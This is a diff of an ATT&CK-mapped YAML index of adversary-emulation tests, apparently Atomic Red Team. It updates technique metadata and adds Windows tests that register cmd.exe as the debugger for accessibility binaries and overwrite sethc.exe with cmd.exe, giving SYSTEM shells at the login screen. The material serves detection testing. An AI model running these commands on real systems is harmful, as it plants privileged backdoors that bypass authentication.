marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2020-02-11T18:58:11.791Z' + modified: '2020-10-21T01:30:56.227Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + - kill_chain_name: mitre-attack + phase_name: credential-access + type: attack-pattern external_references: - source_name: mitre-attack external_id: T1056.001 @@ -25187,21 +7489,35 @@ collection: url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 description: Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - - kill_chain_name: mitre-attack - phase_name: credential-access - modified: '2020-10-21T01:30:56.227Z' - created: '2020-02-11T18:58:11.791Z' - x_mitre_platforms: - - Windows - - macOS - - Linux - - Network - x_mitre_is_subtechnique: true - x_mitre_version: '1.1' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Keylogging + description: "Adversaries may log user keystrokes to intercept credentials as + the user types them. Keylogging is likely to be used to acquire credentials + for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) + efforts are not effective, and may require an adversary to intercept keystrokes + on a system for a substantial period of time before credentials can be successfully + captured.\n\nKeylogging is the most prevalent type of input capture, with + many different ways of intercepting keystrokes.(Citation: Adventures of a + Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing + keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), + this focuses solely on API functions intended for processing keystroke data.\n* + Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* + Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) + may provide adversaries with hooks into the operating system of network devices + to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device + Attacks) " + id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4 + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Driver: Driver Load' + - 'Process: OS API Execution' + x_mitre_permissions_required: + - Administrator + - root + - SYSTEM + - User x_mitre_detection: 'Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, @@ -25210,15 +7526,13 @@ collection: keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.' - x_mitre_permissions_required: - - Administrator - - root - - SYSTEM - - User - x_mitre_data_sources: - - Windows Registry - - Process monitoring - - API monitoring + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + - macOS + - Linux + - Network identifier: T1056.001 atomic_tests: - name: Input Capture @@ -25366,10 +7680,10 @@ collection: - Eric Kuehn, Secure Ideas - Matthew Demaske, Adaptforward x_mitre_data_sources: - - Windows event logs - - Windows Registry - - Packet capture - - Netflow/Enclave netflow + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Flow' + - 'Service: Service Creation' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_permissions_required: - User x_mitre_detection: |- @@ -25410,9 +7724,9 @@ collection: - macOS - Windows x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring + - 'File: File Access' + - 'File: File Creation' + - 'Command: Command Execution' x_mitre_detection: |- Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. @@ -25519,10 +7833,8 @@ collection: x_mitre_platforms: - Windows x_mitre_data_sources: - - Process monitoring - - File monitoring - - Authentication logs - - Mail server + - 'File: File Access' + - 'Command: Command Execution' x_mitre_detection: Monitor processes and command-line arguments for actions that could be taken to gather local email files. Monitor for unusual processes accessing local email files. Remote access tools with built-in features may @@ -25578,8 +7890,21 @@ collection: name: powershell T1185: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2018-01-16T16:13:52.465Z' + modified: '2021-02-09T15:34:09.429Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + type: attack-pattern + id: attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Man in the Browser + description: |- + Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser) + + A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions) + + Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. (Citation: cobaltstrike manual) external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1185 @@ -25600,41 +7925,26 @@ collection: description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017. source_name: cobaltstrike manual - description: |- - Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser) - - A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions) - - Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. (Citation: cobaltstrike manual) - name: Man in the Browser - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-07-14T19:39:44.590Z' - created: '2018-01-16T16:13:52.465Z' - x_mitre_is_subtechnique: false - x_mitre_version: '1.0' - x_mitre_contributors: - - Justin Warner, ICEBRG - x_mitre_data_sources: - - Authentication logs - - Packet capture - - Process monitoring - - API monitoring + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_platforms: + - Windows + x_mitre_permissions_required: + - Administrator + - SYSTEM x_mitre_detection: This is a difficult technique to detect because adversary traffic would be masked by normal user traffic. No new processes are created and no additional software touches disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. - Monitor for process injection against browser applications - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_platforms: - - Windows + Monitor for process injection against browser applications. + x_mitre_data_sources: + - 'Process: Process Access' + - 'Logon Session: Logon Session Creation' + x_mitre_contributors: + - Justin Warner, ICEBRG + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false atomic_tests: [] T1557: technique: @@ -25672,9 +7982,10 @@ collection: MiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow. x_mitre_data_sources: - - File monitoring - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Flow' + - 'Service: Service Creation' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_permissions_required: - User x_mitre_version: '1.1' @@ -25728,9 +8039,8 @@ collection: modified: '2020-10-22T01:45:55.144Z' created: '2020-10-20T00:08:21.745Z' x_mitre_data_sources: - - Netflow/Enclave netflow - - Network protocol analysis - - Packet capture + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' x_mitre_permissions_required: - Administrator x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts @@ -25766,42 +8076,35 @@ collection: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: collection - modified: '2020-09-14T19:48:07.491Z' + modified: '2021-03-08T10:33:02.019Z' created: '2020-03-13T21:14:58.206Z' x_mitre_contributors: - Praetorian - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_detection: |- Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring + - 'File: File Access' + - 'File: File Creation' + - 'Command: Command Execution' x_mitre_platforms: + - Windows + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure atomic_tests: [] T1114.002: technique: - created: '2020-02-19T18:52:24.547Z' - modified: '2020-02-19T20:53:50.908Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - type: attack-pattern id: attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a - description: Adversaries may target an Exchange server or Office 365 to collect - sensitive information. Adversaries may leverage a user's credentials and interact - directly with the Exchange server to acquire information from within a network. - Adversaries may also access externally facing Exchange services or Office - 365 to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) + description: Adversaries may target an Exchange server, Office 365, or Google + Workspace to collect sensitive information. Adversaries may leverage a user's + credentials and interact directly with the Exchange server to acquire information + from within a network. Adversaries may also access externally facing Exchange + services, Office 365, or Google Workspace to access email using credentials + or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords. name: Remote Email Collection created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -25811,19 +8114,25 @@ collection: - source_name: mitre-attack external_id: T1114.002 url: https://attack.mitre.org/techniques/T1114/002 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2021-03-25T13:12:56.909Z' + created: '2020-02-19T18:52:24.547Z' x_mitre_platforms: - Office 365 - Windows + - Google Workspace x_mitre_data_sources: - - Authentication logs - - Email gateway - - Mail server - - Office 365 trace logs + - 'Network Traffic: Network Connection Creation' + - 'Logon Session: Logon Session Creation' + - 'Command: Command Execution' x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account).' x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' atomic_tests: [] T1602.001: technique: @@ -25878,9 +8187,8 @@ collection: modified: '2020-10-22T01:54:22.812Z' created: '2020-10-19T23:51:05.953Z' x_mitre_data_sources: - - Netflow/Enclave netflow - - Network protocol analysis - - Packet capture + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_permissions_required: @@ -25931,9 +8239,8 @@ collection: x_mitre_is_subtechnique: false x_mitre_version: '1.1' x_mitre_data_sources: - - API monitoring - - Process monitoring - - File monitoring + - 'Process: OS API Execution' + - 'Command: Command Execution' x_mitre_detection: Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes @@ -26134,9 +8441,8 @@ collection: In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n" x_mitre_data_sources: - - Office 365 audit logs - - Authentication logs - - Application logs + - 'Logon Session: Logon Session Creation' + - 'Application Log: Application Log Content' x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_permissions_required: @@ -26147,8 +8453,21 @@ collection: atomic_tests: [] T1125: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2017-05-31T21:31:37.917Z' + modified: '2020-07-14T19:40:47.644Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + type: attack-pattern + id: attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Video Capture + description: |- + An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files. + + Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen. + + In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review) external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1125 @@ -26159,38 +8478,24 @@ collection: - url: https://objective-see.com/blog/blog_0x25.html description: Patrick Wardle. (n.d.). Retrieved March 20, 2018. source_name: objective-see 2017 review - description: |- - An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files. - - Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen. - - In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review) - name: Video Capture - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-07-14T19:40:47.644Z' - created: '2017-05-31T21:31:37.917Z' - x_mitre_is_subtechnique: false - x_mitre_version: '1.0' - x_mitre_contributors: - - Praetorian - x_mitre_data_sources: - - Process monitoring - - File monitoring - - API monitoring + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_platforms: + - Windows + - macOS + x_mitre_permissions_required: + - User x_mitre_detection: |- Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system. Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data. - x_mitre_permissions_required: - - User - x_mitre_platforms: - - Windows - - macOS + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Command: Command Execution' + x_mitre_contributors: + - Praetorian + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false atomic_tests: [] T1056.003: technique: @@ -26225,7 +8530,7 @@ collection: x_mitre_system_requirements: - An externally facing login portal is configured. x_mitre_data_sources: - - File monitoring + - 'File: File Modification' x_mitre_detection: File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content. @@ -26236,7 +8541,7 @@ collection: - macOS - Windows atomic_tests: [] -defense-evasion: +privilege-escalation: T1548: technique: external_references: @@ -26264,11 +8569,13 @@ defense-evasion: modified: '2020-07-22T21:36:52.825Z' created: '2020-01-30T13:58:14.373Z' x_mitre_data_sources: - - Windows Registry - - File monitoring - - Process command-line parameters - - API monitoring - - Process monitoring + - 'Process: Process Metadata' + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'File: File Metadata' + - 'File: File Modification' + - 'Process: OS API Execution' x_mitre_permissions_required: - Administrator - User @@ -26334,7 +8641,7 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-04-16T19:37:02.355Z' + modified: '2021-04-24T13:40:52.952Z' created: '2017-12-14T16:46:06.044Z' x_mitre_defense_bypassed: - Windows User Account Control @@ -26350,12 +8657,9627 @@ defense-evasion: - Robby Winchester, @robwinchester3 - Jared Atkinson, @jaredcatkinson x_mitre_data_sources: - - Authentication logs - - Windows event logs - - API monitoring - - Access tokens - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Process: Process Metadata' + - 'Process: OS API Execution' + - 'User Account: User Account Metadata' + - 'Active Directory: Active Directory Object Modification' + - 'Command: Command Execution' + x_mitre_detection: "If an adversary is using a standard command-line shell, + analysts can detect token manipulation by auditing command-line activity. + Specifically, analysts should look for use of the runas command. + Detailed command-line logging is not enabled by default in Windows.(Citation: + Microsoft Command-line Logging)\n\nIf an adversary is using a payload that + calls the Windows token APIs directly, analysts can detect token manipulation + only through careful analysis of user network activity, examination of running + processes, and correlation with other endpoint and network behavior. \n\nThere + are many Windows API calls a payload can take advantage of to manipulate access + tokens (e.g., LogonUser (Citation: Microsoft LogonUser), DuplicateTokenEx(Citation: + Microsoft DuplicateTokenEx), and ImpersonateLoggedOnUser(Citation: + Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API + pages for more information.\n\nQuery systems for process and thread token + information and look for inconsistencies such as user owns processes impersonating + the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)\n\nLook + for inconsistencies between the various fields that store PPID information, + such as the EventHeader ProcessId from data collected via Event Tracing for + Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID + and ParentProcessID (which are also produced from ETW and other utilities + such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId + identifies the actual parent process." + x_mitre_permissions_required: + - User + - Administrator + x_mitre_effective_permissions: + - SYSTEM + x_mitre_platforms: + - Windows + atomic_tests: [] + T1546.008: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.008 + url: https://attack.mitre.org/techniques/T1546/008 + - external_id: CAPEC-558 + source_name: capec + url: https://capec.mitre.org/data/definitions/558.html + - url: https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html + description: 'Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: + Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.' + source_name: FireEye Hikit Rootkit + - url: https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom + description: Maldonado, D., McGuffin, T. (2016, August 6). Sticky Keys to + the Kingdom. Retrieved July 5, 2017. + source_name: DEFCON2016 Sticky Keys + - url: http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/ + description: Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. + Retrieved November 12, 2014. + source_name: Tilbury 2014 + - source_name: Narrator Accessibility Abuse + url: https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html + description: Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub' + URI for Fileless Persistence. Retrieved April 28, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Accessibility Features + description: |- + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. + + Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit) + + Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. + + For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014) + + Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse) + + * On-Screen Keyboard: C:\Windows\System32\osk.exe + * Magnifier: C:\Windows\System32\Magnify.exe + * Narrator: C:\Windows\System32\Narrator.exe + * Display Switcher: C:\Windows\System32\DisplaySwitch.exe + * App Switcher: C:\Windows\System32\AtBroker.exe + id: attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-05-13T20:37:30.048Z' + created: '2020-01-24T14:32:40.315Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - SYSTEM + x_mitre_permissions_required: + - Administrator + x_mitre_detection: Changes to accessibility utility binaries or binary paths + that do not correlate with known software, patch cycles, etc., are suspicious. + Command line invocation of tools capable of modifying the Registry for associated + keys are also suspicious. Utility arguments and the binaries themselves should + be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_contributors: + - Paul Speulstra, AECOM Global Security Operations Center + x_mitre_platforms: + - Windows + identifier: T1546.008 + atomic_tests: + - name: Attaches Command Prompt as a Debugger to a List of Target Processes + auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 + description: | + Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables. + + Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe. + supported_platforms: + - windows + input_arguments: + parent_list: + description: 'Comma separated list of system binaries to which you want + to attach each #{attached_process}. Default: "osk.exe" + +' + type: String + default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, + atbroker.exe + attached_process: + description: 'Full path to process to attach to target in #{parent_list}. + Default: cmd.exe + +' + type: Path + default: C:\windows\system32\cmd.exe + executor: + command: | + $input_table = "#{parent_list}".split(",") + $Name = "Debugger" + $Value = "#{attached_process}" + Foreach ($item in $input_table){ + $item = $item.trim() + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + } + cleanup_command: | + $input_table = "#{parent_list}".split(",") + Foreach ($item in $input_table) + { + $item = $item.trim() + reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f 2>&1 | Out-Null + } + name: powershell + elevation_required: true + - name: Replace binary of sticky keys + auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 + description: 'Replace sticky keys binary (sethc.exe) with cmd.exe + +' + supported_platforms: + - windows + executor: + command: | + copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe + takeown /F C:\Windows\System32\sethc.exe /A + icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t + copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe + cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe + +' + name: command_prompt + elevation_required: true + T1547.014: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.014 + url: https://attack.mitre.org/techniques/T1547/014 + - source_name: Klein Active Setup 2010 + url: https://helgeklein.com/blog/2010/04/active-setup-explained/ + description: Klein, H. (2010, April 22). Active Setup Explained. Retrieved + December 18, 2020. + - source_name: Mandiant Glyer APT 2010 + url: https://digital-forensics.sans.org/summit-archives/2010/35-glyer-apt-persistence-mechanisms.pdf + description: Glyer, C. (2010). Examples of Recent APT Persitence Mechanism. + Retrieved December 18, 2020. + - source_name: Citizenlab Packrat 2015 + url: https://citizenlab.ca/2015/12/packrat-report/ + description: Scott-Railton, J., et al. (2015, December 8). Packrat. Retrieved + December 18, 2020. + - source_name: FireEye CFR Watering Hole 2012 + url: https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html + description: Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. + Retrieved December 18, 2020. + - source_name: SECURELIST Bright Star 2015 + url: https://securelist.com/whos-really-spreading-through-the-bright-star/68978/ + description: Baumgartner, K., Guerrero-Saade, J. (2015, March 4). Who’s Really + Spreading through the Bright Star?. Retrieved December 18, 2020. + - source_name: paloalto Tropic Trooper 2016 + url: https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/ + description: Ray, V., et al. (2016, November 22). Tropic Trooper Targets Taiwanese + Government and Fossil Fuel Provider With Poison Ivy. Retrieved December + 18, 2020. + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Active Setup + description: |- + Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level. + + Adversaries may abuse Active Setup by creating a key under HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ and setting a malicious value for StubPath. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016) + + Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. + id: attack-pattern--22522668-ddf6-470b-a027-9d6866679f67 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-03-05T22:36:37.414Z' + created: '2020-12-18T16:33:13.098Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Monitor Registry key additions and/or modifications to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\. + + Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the Active Setup Registry locations and startup folders.(Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data. + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_contributors: + - Bencherchali Nasreddine, @nas_bench, ELIT Security Team (DSSD) + x_mitre_platforms: + - Windows + atomic_tests: [] + T1546.009: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.009 + url: https://attack.mitre.org/techniques/T1546/009 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + - url: https://forum.sysinternals.com/appcertdlls_topic12546.html + description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls. + Retrieved December 18, 2017. + source_name: Sysinternals AppCertDlls Oct 2007 + object_marking_refs: + - 